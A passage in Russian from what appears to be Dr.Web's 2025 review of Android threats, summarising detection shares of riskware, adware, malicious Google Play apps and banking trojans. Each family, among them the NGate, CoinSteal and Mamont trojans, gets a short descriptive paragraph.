    &lt;dd&gt;Программа для наблюдения за владельцами Android-устройств. Она позволяет читать СМС, получать информацию о телефонных вызовах, отслеживать местоположение и выполнять аудиозапись окружения.&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;Потенциально опасные программы&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;В 2025 году самым распространенным потенциально опасным ПО стали программы, модифицированные при помощи инструмента NP Manager. Это утилита для модификации приложений, которая содержит различные модули для обфускации и защиты кода программ, а также обхода проверки их цифровой подписи после модификации. Злоумышленники часто применяют ее для защиты вредоносных приложений, чтобы затруднить их детектирование антивирусами. Доля таких программ по сравнению с 2024 годом возросла с 24,52% до 53,59%, и на них пришлось уже более половины детектирований потенциально опасного ПО. Чаще всего на защищаемых устройствах встречались варианты &lt;b&gt;Tool.NPMod.3&lt;/b&gt; (32,85%), &lt;b&gt;Tool.NPMod.1&lt;/b&gt; (12,61%), &lt;b&gt;Tool.NPMod.1.origin&lt;/b&gt; (3,02%) и &lt;b&gt;Tool.NPMod.4&lt;/b&gt; (2,31%).&lt;/p&gt;

&lt;p&gt;С 3,93% до 8,11% возросло количество детектирований &lt;a href="https://vms.drweb.kz/search/?q=Tool.Androlua&amp;lng=kk"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt; — ряда фреймворков, созданных для разработки Android-приложений на языке программирования Lua. Они требуют множество системных разрешений, включая использование службы специальных возможностей Android. Созданные с их помощью программы построены на Lua-скриптах, которые зашифрованы и расшифровываются только непосредственно перед исполнением. Такие скрипты потенциально могут быть вредоносными. С 8,16% до 10,06% увеличилась доля приложений, модифицированных при помощи утилиты &lt;a href="https://vms.drweb.kz/search/?q=Tool.LuckyPatcher&amp;lng=kk"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;. Этот инструмент модифицирует установленные программы, загружая из интернета специально подготовленные скрипты.&lt;/p&gt;

&lt;p&gt;В то же время доля утилит &lt;a href="https://vms.drweb.kz/search/?q=Tool.SilentInstaller&amp;lng=kk"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;, которые позволяют запускать Android-приложения без их установки, снизилась с 33,10% до 10,55%. Самыми распространенными вариантами семейства в 2025 году стали &lt;a href="https://vms.drweb.kz/search/?q=Tool.SilentInstaller&amp;lng=kk"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt; (4,66%), &lt;a href="https://vms.drweb.kz/search/?q=Tool.SilentInstaller&amp;lng=kk"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.6.origin&lt;/b&gt; (2,07%) и &lt;a href="https://vms.drweb.kz/search/?q=Tool.SilentInstaller&amp;lng=kk"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt; (1,88%). Кроме того, с 13,17% до 2,58% уменьшилась доля программ, защищенных упаковщиком &lt;a href="https://vms.drweb.kz/search/?q=Tool.Packer&amp;lng=kk"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;Десять наиболее распространенных потенциально опасных приложений, обнаруженных на Android-устройствах в 2025 году:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/10_2025_riskware_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/10_2025_riskware_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование Android-приложений, модифицированных при помощи утилиты NP Manager. Эта утилита содержит модули для обфускации и защиты кода программ, а также обхода проверки их цифровой подписи после модификации. Добавляемая ей обфускация часто используется во вредоносном ПО для затруднения его детектирования и анализа.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Tool.Androlua&amp;lng=kk"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование ряда потенциально опасных версий специализированного фреймворка для разработки Android-программ на скриптовом языке программирования Lua. Основная логика Lua-приложений расположена в соответствующих скриптах, которые зашифрованы и расшифровываются интерпретатором перед выполнением. Часто данный фреймворк по умолчанию запрашивает доступ ко множеству системных разрешений для работы, в том числе для использования сервиса специальных возможностей ОС Android. В результате исполняемые через него Lua-скрипты способны выполнять различные вредоносные действия в соответствии с полученными разрешениями.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Tool.LuckyPatcher&amp;lng=kk"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Tool.LuckyPatcher&amp;lng=kk"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Утилита, позволяющая модифицировать установленные Android-приложения (создавать для них патчи) с целью изменения логики их работы или обхода тех или иных ограничений. Например, с ее помощью пользователи могут попытаться отключить проверку root-доступа в банковских программах или получить неограниченные ресурсы в играх. Для создания патчей утилита загружает из интернета специально подготовленные скрипты, которые могут создавать и добавлять в общую базу все желающие. Функциональность таких скриптов может оказаться в том числе и вредоносной, поэтому создаваемые патчи могут представлять потенциальную опасность.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Tool.SilentInstaller&amp;lng=kk"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Потенциально опасная программная платформа, которая позволяет приложениям запускать APK-файлы без их установки. Она создает виртуальную среду исполнения, которая не затрагивает основную операционную систему.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Tool.Packer&amp;lng=kk"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Специализированная утилита-упаковщик для защиты Android-приложений от модификации и обратного инжиниринга. Она не является вредоносной, но может использоваться для защиты как безобидных, так и троянских программ.&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;Рекламные приложения&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;Среди рекламного ПО наибольшее распространение в 2025 году получили сторонние модификации приложения WhatsApp, детектируемые как &lt;a href="https://vms.drweb.kz/search/?q=Adware.ModAd&amp;lng=kk"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;. В такие модификации внедрена функциональность по открытию ссылок при работе с мессенджером. С этих ссылок выполняется перенаправление на рекламируемые сайты. По сравнению с 2024 годом доля &lt;a href="https://vms.drweb.kz/search/?q=Adware.ModAd&amp;lng=kk"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; от общего числа рекламных приложений, обнаруженных на защищаемых устройствах, снизилась с 47,45% до 26,90%.&lt;/p&gt;

&lt;p&gt;Встраиваемые в Android-программы модули &lt;a href="https://vms.drweb.kz/search/?q=Adware.Adpush&amp;lng=kk"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;, которые демонстрируют рекламные уведомления, расположились на втором месте, за год увеличив активность с 14,76% до 26,19%. Третье место с показателем 8,88% заняли представители семейства &lt;b&gt;Adware.Basement&lt;/b&gt;, доля которых по сравнению с годом ранее осталась практически неизменной. Такие программы могут показывать рекламу, которая ведет на вредоносные сайты.&lt;/p&gt;

&lt;p&gt;Распространение также получили семейства рекламных приложений &lt;a href="https://vms.drweb.kz/search/?q=Adware.Airpush&amp;lng=kk"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt; (число детектирований возросло с 4,35% до 5,14%), &lt;a href="https://vms.drweb.kz/search/?q=Adware.Fictus&amp;lng=kk"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt; (рост с 3,29% до 6,21%), &lt;b&gt;Adware.Youmi&lt;/b&gt; (рост с 1,62% до 2,91%) а также &lt;a href="https://vms.drweb.kz/search/?q=Adware.Leadbolt&amp;lng=kk"&gt;&lt;b&gt;Adware.Leadbolt&lt;/b&gt;&lt;/a&gt; (рост с 2,26% до 2,41%) и &lt;b&gt;Adware.Jiubang&lt;/b&gt; (рост с 1,70% до 2,38%).&lt;/p&gt;

&lt;p&gt;Десять наиболее распространенных рекламных приложений, обнаруженных на Android-устройствах в 2025 году:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/11_2025_adware_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/11_2025_adware_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Adware.ModAd&amp;lng=kk"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование некоторых модифицированных версий (модов) мессенджера WhatsApp, в функции которых внедрен код для загрузки заданных ссылок через веб-отображение во время работы с мессенджером. С этих интернет-адресов выполняется перенаправление на рекламируемые сайты — например, онлайн-казино и букмекеров, сайты для взрослых.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Adware.AdPush&amp;lng=kk"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Adware.Adpush&amp;lng=kk"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Adware.AdPush&amp;lng=kk"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.39.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Рекламные модули, которые могут быть интегрированы в Android-программы. Они демонстрируют рекламные уведомления, вводящие пользователей в заблуждение. Например, такие уведомления могут напоминать сообщения от операционной системы. Кроме того, эти модули собирают ряд конфиденциальных данных, а также способны загружать другие приложения и инициировать их установку.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Приложения, демонстрирующие нежелательную рекламу, которая часто ведет на вредоносные и мошеннические сайты. Они имеют общую кодовую базу с нежелательными программами &lt;a href="https://vms.drweb.kz/search/?q=Program.FakeMoney&amp;lng=kk"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Adware.Fictus&amp;lng=kk"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Рекламный модуль, который злоумышленники встраивают в версии-клоны популярных Android-игр и программ. Его интеграция в программы происходит при помощи специализированного упаковщика net2share. Созданные таким образом копии ПО распространяются через различные каталоги приложений и после установки демонстрируют нежелательную рекламу.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Adware.Airpush&amp;lng=kk"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Программные модули, встраиваемые в Android-приложения и демонстрирующие разнообразную рекламу. В зависимости от версии и модификации это могут быть рекламные уведомления, всплывающие окна или баннеры. С помощью данных модулей злоумышленники часто распространяют вредоносные программы, предлагая установить то или иное ПО. Кроме того, такие модули передают на удаленный сервер различную конфиденциальную информацию.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Adware.Youmi&amp;lng=kk"&gt;&lt;b&gt;Adware.Youmi&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование нежелательного рекламного модуля, который размещает рекламные ярлыки на главном экране Android-устройств.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Jiubang.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Нежелательное рекламное ПО для Android-устройств, которое при установке приложений демонстрирует баннер с рекомендуемыми к установке программами.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.kz/search/?q=Adware.Inmobi&amp;lng=kk"&gt;&lt;b&gt;Adware.Inmobi&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование некоторых версий рекламного SDK Inmobi, способных совершать телефонные звонки и добавлять события в календарь Android-устройств.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Угрозы в Google Play&lt;/h3&gt;

&lt;p&gt;В 2025 году антивирусная лаборатория компании «Доктор Веб» обнаружила в каталоге Google Play более 180 вредоносных, нежелательных и рекламных программ, которые суммарно были установлены по меньшей мере 2 165 040 раз. Среди них были различные модификации троянов &lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4213&lt;/b&gt; и &lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4215&lt;/b&gt;, которые скрывали присутствие на зараженных устройствах и демонстрировали рекламу поверх интерфейса операционной системы и других приложений. Эти трояны распространялись под видом фоторедакторов, программ для фото- и видеосъемки и другого ПО.&lt;/p&gt;

&lt;div class="img img-two mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/12_Android.HiddenAds.4215_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/12_Android.HiddenAds.4215_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/13_Android.HiddenAds.4213_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/13_Android.HiddenAds.4213_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Программы Time Shift Cam и Fusion Collage Editor были рекламными троянами &lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Под видом официального ПО криптобиржи Dydx и блокчейн-платформ Raydium и Aerodrome Finance киберпреступники распространяли трояны &lt;a href="https://vms.drweb.kz/search/?q=Android.CoinSteal&amp;lng=kk"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.202&lt;/b&gt;, &lt;a href="https://vms.drweb.kz/search/?q=Android.CoinSteal&amp;lng=kk"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.203&lt;/b&gt; и &lt;a href="https://vms.drweb.kz/search/?q=Android.CoinSteal&amp;lng=kk"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.206&lt;/b&gt;, похищавших криптовалюту.&lt;/p&gt;

&lt;div class="img img-two mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/14_Android.CoinSteal.203_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/14_Android.CoinSteal.203_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/15_Android.CoinSteal.202_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/15_Android.CoinSteal.202_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;В программах Raydium и Dydx Exchange скрывалось троянское ПО для кражи криптовалюты&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Эти вредоносные приложения предлагали пользователям ввести мнемоническую фразу якобы для подключения криптокошелька, однако на самом деле вводимые данные отправлялись злоумышленникам. Чтобы еще больше ввести потенциальных жертв в заблуждение, формы для ввода мнемонических фраз могли быть замаскированы под запросы от других криптоплатформ.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/16_seed_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/16_seed_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/17_seed_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/17_seed_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;&lt;b&gt;Android.CoinSteal.206&lt;/b&gt; демонстрирует фишинговую форму якобы от имени криптобиржи PancakeSwap и запрашивает мнемоническую фразу для доступа к криптокошельку&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;В течение года наши специалисты выявили в Google Play более 80 вредоносных приложений семейства &lt;a href="https://vms.drweb.kz/search/?q=Android.Joker&amp;lng=kk"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, подписывающих пользователей на платные услуги. Они распространялись под видом различного ПО, включая мессенджеры, программы для фотосъемки, системные утилиты, редакторы изображений и программы для работы с документами.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/18_Android.Joker.2494_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/18_Android.Joker.2494_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/19_Android.Joker.2496_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/19_Android.Joker.2496_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Примеры выявленных троянов &lt;b&gt;Android.Joker&lt;/b&gt;: &lt;b&gt;Android.Joker.2494&lt;/b&gt; распространялся в виде мессенджера File Text Messages, а &lt;b&gt;Android.Joker.2496&lt;/b&gt; — под видом утилиты Useful Cleaner для оптимизации работы смартфона&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Киберпреступники вновь распространяли всевозможные программы-подделки &lt;a href="https://vms.drweb.kz/search/?q=Android.FakeApp&amp;lng=kk"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, которые применяются в различных мошеннических схемах. Их основной задачей является загрузка целевых веб-страниц. Часть этих троянов злоумышленники выдавали за ПО финансовой тематики. Такие программы загружали мошеннические сайты, якобы связанные с инвестициями и онлайн-заработком, а также фишинговые сайты. Другие программы-подделки &lt;a href="https://vms.drweb.kz/search/?q=Android.FakeApp&amp;lng=kk"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; распространялись под видом игр и при определенных условиях могли загружать сайты онлайн-казино и букмекеров. В общей сложности мы зафиксировали более 100 таких программ в Google Play.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/20_Android.FakeApp.1840_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/20_Android.FakeApp.1840_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/21_Android.FakeApp.1863_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/21_Android.FakeApp.1863_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Примеры приложений-подделок &lt;b&gt;Android.FakeApp&lt;/b&gt;. Троян &lt;b&gt;Android.FakeApp.1863&lt;/b&gt;, который скрывался в программе TPAO, был ориентирован на турецких пользователей и предлагал им управлять депозитами и доходами. А троян &lt;b&gt;Android.FakeApp.1840&lt;/b&gt; распространялся в виде игры Pino Bounce и мог загружать сайт онлайн-казино&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Вирусные аналитики «Доктор Веб» также обнаружили новое нежелательное рекламное ПО &lt;a href="https://vms.drweb.kz/search/?q=Adware.Adpush&amp;lng=kk"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21912&lt;/b&gt;, которое скрывалось в программе Coin News Promax с информацией о криптовалютах. &lt;a href="https://vms.drweb.kz/search/?q=Adware.Adpush&amp;lng=kk"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21912&lt;/b&gt; демонстрирует уведомления, при нажатии на которые в WebView загружается заданная C2-сервером ссылка.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/22_Adware.Adpush.21912_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/22_Adware.Adpush.21912_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Приложение Coin News Promax из Google Play являлось рекламным ПО &lt;b&gt;Adware.Adpush.21912&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Кроме того, наши специалисты выявили нежелательную программу &lt;a href="https://vms.drweb.kz/search/?q=Program.FakeMoney&amp;lng=kk"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.16&lt;/b&gt;, которая распространялась в виде приложения Zeus Jackpot Mania. Пользователи в игровой форме получали в нем виртуальные награды, которые затем якобы могли конвертировать в настоящие деньги и вывести из приложения.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/23_Program.FakeMoney.16_1_Zeus Jackpot Mania_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/23_Program.FakeMoney.16_1_Zeus Jackpot Mania_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Программа Zeus Jackpot Mania представляла собой нежелательное приложение &lt;b&gt;Program.FakeMoney.16&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Для «вывода» денег программа запрашивала ряд данных, однако никаких выплат пользователи не получали.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/24_Program.FakeMoney.16_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/24_Program.FakeMoney.16_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;&lt;b&gt;Program.FakeMoney.16&lt;/b&gt; просит указать полное имя пользователя и сведения об учетной записи банка&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Банковские трояны&lt;/h3&gt;

&lt;p&gt;По данным статистики детектирований Dr.Web Security Space для мобильных устройств в 2025 году доля банковских троянов от общего числа зафиксированных вредоносных программ составила 6,94%, что чуть выше значения 6,29% годом ранее. В течение первых трех месяцев активность банковских троянов оставалась примерно на одном уровне, однако уже в начале II квартала заметно возросла. Далее она начала постепенно снижаться, достигнув годового минимума в июле. С августа число детектирований вновь стало расти и уже в октябре достигло пика. В конце года наблюдалось очередное снижение.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/25_banker_2025_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/25_banker_2025_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;В 2025 году злоумышленники по-прежнему использовали ряд популярных семейств банковских троянов в проводимых атаках. Среди наиболее активных были вредоносные программы &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;, &lt;a href="https://vms.drweb.kz/search/?q=Android.BankBot.Coper" target="_blank"&gt;Coper&lt;/a&gt;, &lt;b&gt;Android.BankBot.Ermac&lt;/b&gt; и ряд других. Кроме того, были выявлены новые версии троянов &lt;a href="https://vms.drweb.kz/virus/?i=29204494" target="_blank"&gt;NGate&lt;/a&gt;, которые используют технологию NFC для кражи денег. Эти вредоносные программы передают злоумышленникам данные с NFC-чипа зараженных устройств, позволяя мошенникам без дальнейшего вовлечения пользователей снимать деньги со счетов жертв в банкоматах или совершать покупки с использованием бесконтактной оплаты. Среди наиболее активных были такие модификации как &lt;b&gt;Android.Banker.NGate.8&lt;/b&gt;, &lt;b&gt;Android.Banker.NGate.17&lt;/b&gt;, &lt;b&gt;Android.Banker.NGate.5.origin&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;Продолжилось распространение &lt;b&gt;Android.SpyMax&lt;/b&gt; — вредоносных приложений со шпионской функциональностью, основанных на ставшем общедоступным исходном коде RAT-трояна SpyNote. Киберпреступники используют их, в том числе, и в качестве банковских троянов. Вместе с тем активность &lt;b&gt;Android.SpyMax&lt;/b&gt; по сравнению с 2024 годом снизилась. На долю этих вредоносных приложений пришлось 12,35% детектирований банковских троянов против показателя 32,04% годом ранее.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/27_Android.SpyMax_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_mobile/27_Android.SpyMax_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;В 2025 году российские пользователи чаще всего сталкивались с различными банковскими троянами, которые по классификации компании «Доктор Веб» входят в обширное семейство Mamont (&lt;b&gt;Android.Banker.790.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.Mamont.3.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.Mamont.28.origin&lt;/b&gt;). Оно включает разнообразные вредоносные приложения, которые вирусописатели продолжают активно модифицировать и развивать. Эти программы перехватывают СМС с одноразовыми кодами от кредитных организаций и похищают данные банковских карт и другую конфиденциальную информацию.&lt;/p&gt;

&lt;p&gt;В течение года наши специалисты отмечали активность банковских троянов, нацеленных на жителей Узбекистана и сопредельных с ним государств, включая Армению, Азербайджан и Киргизию. Чаще всего на защищаемых устройствах детектировались &lt;b&gt;Android.Banker.951.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.881.origin&lt;/b&gt; и &lt;b&gt;Android.Banker.963.origin&lt;/b&gt;, крадущие проверочные СМС-коды от кредитных организаций. Киберпреступники постоянно модифицируют такие вредоносные приложения, чтобы усложнить их выявление. Турецких пользователей наиболее часто атаковали банковские трояны &lt;b&gt;Android.BankBot.Coper.12.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.5685&lt;/b&gt; и &lt;b&gt;Android.Banker.864.origin&lt;/b&gt;, также способные похищать содержимое СМС-сообщений.&lt;/p&gt;

&lt;p&gt;В то же время жители Ирана столкнулись с троянами &lt;b&gt;Android.BankBot.1190.origin&lt;/b&gt;, &lt;b&gt;Android.BankBot.1191.origin&lt;/b&gt; и их модификациями. Эти вредоносные программы крадут банковскую информацию из СМС-сообщений: находят в них данные о банковских картах, счетах жертвы, количестве доступных денег, выполненных транзакциях и т. д., после чего отправляют их злоумышленникам. Они также собирают информацию о контактах из телефонной книги и способны отправлять СМС по команде атакующих.&lt;/p&gt;

